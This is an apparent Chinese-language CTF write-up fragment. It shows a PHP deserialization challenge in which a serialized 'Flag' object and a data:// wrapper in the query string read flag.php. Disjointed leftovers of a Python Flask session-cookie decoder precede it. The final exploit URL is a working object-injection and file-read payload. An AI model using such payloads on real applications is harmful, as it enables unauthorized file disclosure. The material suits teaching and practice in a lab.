try: payload = base64_decode(payload) except Exception as e: raise Exception('Could not base64 decode the payload because of an exception')
if decompress: try: payload = zlib.decompress(payload) except Exception as e: raise Exception('Could not zlib decompress the payload before decoding the payload') return session_json_serializer.loads(payload)
if __name__ == '__main__': print(decryption(sys.argv[1].encode()))
class Flag{ //flag.php public $file; public function __tostring(){ if(isset($this->file)){ echo file_get_contents($this->file); echo "<br>"; return ("U R SO CLOSE !///COME ON PLZ"); } } } ?>
很基础的一个反序列化
这里都不需要怎么构链子,只需要public $file=flag.php
1
assword=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
最终exp
1
?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}